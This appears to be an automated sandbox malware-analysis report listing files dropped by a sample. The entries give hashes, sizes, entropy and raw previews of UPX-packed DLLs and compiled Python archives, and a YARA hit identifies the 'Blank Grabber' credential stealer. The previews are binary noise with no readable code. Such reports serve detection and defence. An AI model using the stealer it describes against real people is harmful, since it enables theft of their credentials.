                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):88336
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.9108932581373015
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:wlkdTJ3vEbPVfwGX+zD2z4qVHCy4N491I4lSi5j68Xi4az2yhIJ01uv7SyXN:wUFvEbdfwGOnqpCb491IK/EIJ01uvj
                                                                                                                                                                                                                                                                                                                      MD5:055EB9D91C42BB228A72BF5B7B77C0C8
                                                                                                                                                                                                                                                                                                                      SHA1:5659B4A819455CF024755A493DB0952E1979A9CF
                                                                                                                                                                                                                                                                                                                      SHA-256:DE342275A648207BEF9B9662C9829AF222B160975AD8925CC5612CD0F182414E
                                                                                                                                                                                                                                                                                                                      SHA-512:C5CBA050F4B805A299F5D04EC0DCE9B718A16BC335CAC17F23E96519DA0B9EAAF25AE0E9B29EF3DC56603BFE8317CDC1A67EE6464D84A562CF04BEA52C31CFAC
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...). .......p........................................................`.........................................4...L....................0..........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):27408
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.449801379195215
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:he8SQ/XAVUI1ZCXG5oZa7gJX28IJ9U4NVTHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:he8XPAVhZwvpm8IJ9U4X5YiSyvTo2Et
                                                                                                                                                                                                                                                                                                                      MD5:513DCE65C09B3ABC516687F99A6971D8
                                                                                                                                                                                                                                                                                                                      SHA1:8F744C6F79A23AA380D9E6289CB4504B0E69FE3B
                                                                                                                                                                                                                                                                                                                      SHA-256:D4BE41574C3E17792A25793E6F5BF171BAEEB4255C08CB6A5CD7705A91E896FC
                                                                                                                                                                                                                                                                                                                      SHA-512:621F9670541CAC5684892EC92378C46FF5E1A3D065D2E081D27277F1E83D6C60510C46CAB333C6ED0FF81A25A1BDC0046C7001D14B3F885E25019F9CDD550ED0
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):45328
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.729647917060796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:BVO07RbhED2LEIuo4OCYkbaEts+ZIQivK+F8kp9jHIJywFmk5YiSyv+2Eb:zPkD2LEIuo4E5C30d1jHIJywFmu7Sy21
                                                                                                                                                                                                                                                                                                                      MD5:14392D71DFE6D6BDC3EBCDBDE3C4049C
                                                                                                                                                                                                                                                                                                                      SHA1:622479981E1BBC7DD13C1A852AE6B2B2AEBEA4D7
                                                                                                                                                                                                                                                                                                                      SHA-256:A1E39E2386634069070903E2D9C2B51A42CB0D59C20B7BE50EF95C89C268DEB2
                                                                                                                                                                                                                                                                                                                      SHA-512:0F6359F0ADC99EFAD5A9833F2148B066B2C4BAF564BA16090E04E2B4E3A380D6AFF4C9E7AEAA2BA247F020F7BD97635FCDFE4E3B11A31C9C6EA64A4142333424
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m|.ll}..o|.ll}..h|.ll}..i|.ll}..m|.ll}.lm}.ll}..m|.ll}..a|.ll}..l|.ll}..}.ll}..n|.ll}Rich.ll}........PE..d.....g.........." ...).p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60176
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.847943448203495
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:HqbxjT8JFLTgRG/dv8xxEOKI+C6IJvQl67SydP:KbFT8JZg+8xBd+XIJvQl6L
                                                                                                                                                                                                                                                                                                                      MD5:8CD40257514A16060D5D882788855B55
                                                                                                                                                                                                                                                                                                                      SHA1:1FD1ED3E84869897A1FAD9770FAF1058AB17CCB9
                                                                                                                                                                                                                                                                                                                      SHA-256:7D53DF36EE9DA2DF36C2676CFAEA84EE87E7E2A15AD8123F6ABB48717C3BC891
                                                                                                                                                                                                                                                                                                                      SHA-512:A700C3CE95CE1B3FD65A9F335C7C778643B2F7140920FE7EBF5D9BE1089BA04D6C298BF28427CA774FBF412D7F9B77F45708A8A0729437F136232E72D6231C34
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7.7.7.Oc..7...7.....7...7.....7.....7...7..O.7.7.6.....7...7.....7...7.Rich.7.........................PE..d......g.........." ...)............p-.......................................P............`..........................................K..P....I.......@.......................K......................................p9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):68368
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.86108869046165
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:knDFWlIqOuazwp1eBNcnYTpXZwWVfTwIJL7O497Sy5ArQ:+5MtOu89KYTXwEEIJL7OKjAQ
                                                                                                                                                                                                                                                                                                                      MD5:7EF27CD65635DFBA6076771B46C1B99F
                                                                                                                                                                                                                                                                                                                      SHA1:14CB35CE2898ED4E871703E3B882A057242C5D05
                                                                                                                                                                                                                                                                                                                      SHA-256:6EF0EF892DC9AD68874E2743AF7985590BB071E8AFE3BBF8E716F3F4B10F19B4
                                                                                                                                                                                                                                                                                                                      SHA-512:AC64A19D610448BADFD784A55F3129D138E3B697CF2163D5EA5910D06A86D0EA48727485D97EDBA3C395407E2CCF8868E45DD6D69533405B606E5D9B41BAADC0
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...).........P.......`...................................@............`.........................................l<..d....9.......0.......................<.......................................(..@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):1394456
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.531698507573688
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
                                                                                                                                                                                                                                                                                                                      MD5:A9CBD0455B46C7D14194D1F18CA8719E
                                                                                                                                                                                                                                                                                                                      SHA1:E1B0C30BCCD9583949C247854F617AC8A14CBAC7
                                                                                                                                                                                                                                                                                                                      SHA-256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
                                                                                                                                                                                                                                                                                                                      SHA-512:B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):118617
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.69572849678117
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:SdbCFRk9iJ8uMzGp17i0WCzG9hWoycaCVmD:SAFRaiJxHZjOhWoyczmD
                                                                                                                                                                                                                                                                                                                      MD5:AB05D101C69865BF1E4EE2E538B9D486
                                                                                                                                                                                                                                                                                                                      SHA1:0C49BA8A55D618D9323FD607D8D03ED361AA99A2
                                                                                                                                                                                                                                                                                                                      SHA-256:0FA47A1A5ACB90E9EDC24123EA46B4A7FBDB7FEBBDFADC4A0A6FE35B9C7A42BC
                                                                                                                                                                                                                                                                                                                      SHA-512:5D87AF0EB3B46164C04BB682C6B6E43F959F69D45340E4D203D449E384DF2DEB68013829866CFC3E81927369659174B9CE7D3D74CDD09A45B9273D3BED3BA3B6
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:PK........l.^Y..T............stub-o.pyc........]P"gL-.............................\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.S...r.S.r.\.".\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R.........
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):288772
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.986196183522851
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:Pk5lwfnnLupo67jL06IhG1sfBq3A+4CXYcmdl8SojBwkwL62UwHh:M5MLt+8RJq3PXBmzOBwhdUwB
                                                                                                                                                                                                                                                                                                                      MD5:D2ACF0D62C14BFDC8BDA1755957F3FBB
                                                                                                                                                                                                                                                                                                                      SHA1:7D9671ECDC866462B36E11B62016FA929B405EB4
                                                                                                                                                                                                                                                                                                                      SHA-256:A59241DC944B65D49BBC27B05B2715E0379F9D38706FBC0EEA03DC848CCCCE22
                                                                                                                                                                                                                                                                                                                      SHA-512:8475CAD4F8DCEC54DDAB460552A564EE746542A3D450E03D972AE68B7AE3F6C545A8D856A393F9BB62090A73924389E6D7E29E0ACD4CD689C5BBC4CDDD5C0A5C
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:..eh.......R.....;.}..R.$:.Q.Z...'.:F...H..,..."b....=#}.q......1. ....+.z..'8rXkh...waI.B..7.G....c..I.RF.a2..b]Ub.aY;S....Q...t.{h.+6...vs.'y5.V......s\.>.R ?q.c4<I.... W~.8.p..p..>....E......&.*.e..RX.......rj}q..WUF#...1.j%*&J..$F#y.h..D.....z...S<.[Bj._ ...l.........9%..J.g..SK9.Q.....'....R......H,....W.......j..3.}<.x.~.jH..R.lj.....E....e.uU.J7.p........g`..E.c.M.JW..Q..X...l*I.\.?.S..s.......".....*.V..)8H}..'2Oo..I|....J..3$6z..h.J..t....Jo..M.<=.&AG......L.JWT..q.F.T.y......JV........F...V..3...:.q.S.7..v....?...F.5........X.v7.2.#U.u.]....U..v3..k.edf....?]..WGz.F.F..y..2.....F..55Q..<..k*{...^3.9U.?[]....{.3.3...W.3.;........T.Fk+c51..\f3Y..UG{.*......aaBZ[ZD'_.]..NI..j..$.P.A.l..Z#..j..r^DE. +..R.R.\4.-1$9....W~.Z...Q.0Cf.(.y...7.....~PC...xo*..H..x.Ft..g.].zY.....JhHj....D.rNt*..Y.]....]]..)..q."0...Da5..s?..."1yQ.S .T..._';..S.".|ZD.2.#E......0}..f.[:....): kW>.x......W.....`.3J..1i.F....U.ee[..]. ?.P.-."V"..mM..v
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):1630488
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.952879310777133
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
                                                                                                                                                                                                                                                                                                                      MD5:8377FE5949527DD7BE7B827CB1FFD324
                                                                                                                                                                                                                                                                                                                      SHA1:AA483A875CB06A86A371829372980D772FDA2BF9
                                                                                                                                                                                                                                                                                                                      SHA-256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
                                                                                                                                                                                                                                                                                                                      SHA-512:C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):29968
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                                                                                                                      MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                                                                                                                      SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                                                                                                                      SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                                                                                                                      SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):227096
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.928768674438361
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
                                                                                                                                                                                                                                                                                                                      MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
                                                                                                                                                                                                                                                                                                                      SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
                                                                                                                                                                                                                                                                                                                      SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
                                                                                                                                                                                                                                                                                                                      SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):1850640
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.994061638516346
                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:l+wZGihuIlkSb9jVzMR3Wbp+JL3o+2H5V8Saryhll3DgsZ:1GbYk8w9YpgLY+2H5eSaryt3DgM
                                                                                                                                                                                                                                                                                                                      MD5:6EF5D2F77064DF6F2F47AF7EE4D44F0F
                                                                                                                                                                                                                                                                                                                      SHA1:0003946454B107874AA31839D41EDCDA1C77B0AF
                                                                                                                                                                                                                                                                                                                      SHA-256:AB7C640F044D2EB7F4F0A4DFE5E719DFD9E5FCD769943233F5CECE436870E367
                                                                                                                                                                                                                                                                                                                      SHA-512:1662CC02635D63B8114B41D11EC30A2AF4B0B60209196AAC937C2A608588FEE47C6E93163EA6BF958246C32759AC5C82A712EA3D690E796E2070AC0FF9104266
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).@........J..3e...J..................................0f...........`.........................................H_e......Ye......Pe......0]..............'f.4............................?e.(...@@e.@...........................................UPX0......J.............................UPX1.....@....J..2..................@....rsrc........Pe......6..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):630736
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                                                                                                      MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                                                                                                      SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                                                                                                      SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                                                                                                      SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):456
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                                                                                                      MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                                                                                                      SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                                                                                                      SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                                                                                                      SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):26384
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.471075877103443
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:LZPhXaWPBRc6hmfZa7gJXIj2IJ9G46SHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:XaWlspYj2IJ9G4L5YiSyvy2ES
